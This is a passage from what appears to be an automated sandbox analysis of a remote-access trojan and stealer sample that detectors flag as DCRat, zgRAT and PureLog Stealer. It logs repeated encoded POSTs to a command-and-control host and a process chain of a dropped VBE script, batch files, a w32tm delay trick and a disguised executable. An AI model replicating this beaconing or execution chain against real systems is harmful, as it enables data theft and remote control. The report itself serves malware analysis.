                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      73192.168.2.44981991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:50.287842989 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:50.629435062 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:50.629688978 CET2548OUTData Raw: 54 59 51 5e 5e 5e 55 55 5e 57 5a 51 57 5a 50 5b 54 55 54 5d 56 5e 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYQ^^^UU^WZQWZP[TUT]V^W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:83[$59,/6Y&8+]19,", !007\1,;%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:51.001543999 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:50 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      74192.168.2.44982191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:51.532035112 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:51.874411106 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:51.879584074 CET1872OUTData Raw: 54 5e 51 5d 5e 5a 50 54 5e 57 5a 51 57 58 50 5d 54 5d 54 5e 56 5b 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q]^ZPT^WZQWXP]T]T^V[WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@,W5'#60&^;0^?\1#,(W#?73$7Y%.]8%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:52.253804922 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 03 26 05 02 0c 34 1d 20 54 3d 03 07 06 2a 57 22 12 2b 2b 3e 00 3d 3f 03 00 38 17 20 57 3f 38 20 18 23 59 28 50 36 32 30 55 26 39 20 5c 05 11 27 13 30 54 25 59 33 04 35 13 30 57 2e 06 26 2c 20 1c 2b 2b 3a 58 27 39 24 03 22 33 24 53 31 5c 30 06 30 01 25 5d 3a 2e 24 00 26 3d 2d 54 02 17 22 50 24 2e 27 05 28 0e 28 00 32 54 2a 05 2a 13 24 56 35 3a 3b 0d 35 33 03 10 31 38 3d 01 20 32 0d 13 3f 06 3c 04 24 12 0e 1a 31 14 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-&4 T=*W"++>=?8 W?8 #Y(P620U&9 \'0T%Y350W.&, ++:X'9$"3$S1\00%]:.$&=-T"P$.'((2T**$V5:;5318= 2?<$1#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      75192.168.2.44982291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:51.651314020 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:51.994503975 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:51.994788885 CET2548OUTData Raw: 54 5b 54 50 5b 5c 55 54 5e 57 5a 51 57 50 50 5d 54 57 54 53 56 5d 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[TP[\UT^WZQWPP]TWTSV]WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/!6$#)Z$!/Y5'^?Y%9$T68Q"+X$4'\2<"Y-)%Z"!Q*
                                                                                      Mar 6, 2024 09:53:52.367233992 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      76192.168.2.44982391.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:52.838244915 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:53.184022903 CET2548OUTData Raw: 54 59 54 50 5b 5d 55 57 5e 57 5a 51 57 5b 50 58 54 57 54 52 56 5f 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYTP[]UW^WZQW[PXTWTRV_WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,%'063%,._0?Z%95!,'_'$<&,=;%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:53.184180021 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:53.558501005 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:53 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      77192.168.2.44982491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:54.026032925 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:54.371263981 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:54.371597052 CET2548OUTData Raw: 54 5a 51 5b 5b 59 55 53 5e 57 5a 51 57 51 50 58 54 52 54 5a 56 55 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TZQ[[YUS^WZQWQPXTRTZVUW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X98:U3310P"_;?>]'3Y2*0",W6+]'$^1,9,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:54.940803051 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      78192.168.2.44982591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:55.406812906 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:55.754362106 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:55.754659891 CET2548OUTData Raw: 51 5b 54 5a 5b 58 50 54 5e 57 5a 51 57 5b 50 5b 54 55 54 5c 56 5e 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TZ[XPT^WZQW[P[TUT\V^W]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9.11'39$/2$/\%3"Z;!, 3'<&<*8)%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:56.131896973 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:55 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      79192.168.2.44982691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:54:04.600178003 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:54:04.947957993 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:54:04.948088884 CET2548OUTData Raw: 54 59 54 5c 5b 5d 55 5c 5e 57 5a 51 57 5e 50 5f 54 50 54 5c 56 54 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYT\[]U\^WZQW^P_TPT\VTW^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@,&W$#&$%:;<*X'8;\%!/ T5?+$$$/"/%Z"!Q*
                                                                                      Mar 6, 2024 09:54:05.323074102 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:54:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:09:51:51
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      Imagebase:0x360000
                                                                                      File size:2'730'343 bytes
                                                                                      MD5 hash:622AF327A5C66CA6D6D41BF02384B590
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:09:51:52
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe"
                                                                                      Imagebase:0xb60000
                                                                                      File size:147'456 bytes
                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:09:52:17
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:09:52:17
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:09:52:18
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\PortCommon/hyperbrokerhostNetsvc.exe
                                                                                      Imagebase:0x630000
                                                                                      File size:5'964'288 bytes
                                                                                      MD5 hash:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1922668864.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 92%, ReversingLabs
                                                                                      • Detection: 75%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:09:52:21
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat"
                                                                                      Imagebase:0x7ff75cd90000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:09:52:22
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:09:52:22
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff73e0d0000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:09:52:22
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Windows\System32\w32tm.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      Imagebase:0x7ff7c2fd0000
                                                                                      File size:108'032 bytes
                                                                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:09:52:27
                                                                                      Start date:06/03/2024
                                                                                      Path:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe"
                                                                                      Imagebase:0xb0000
                                                                                      File size:5'964'288 bytes
                                                                                      MD5 hash:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Avira
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 92%, ReversingLabs
                                                                                      • Detection: 75%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:10%
                                                                                        Total number of Nodes:1521
                                                                                        Total number of Limit Nodes:43
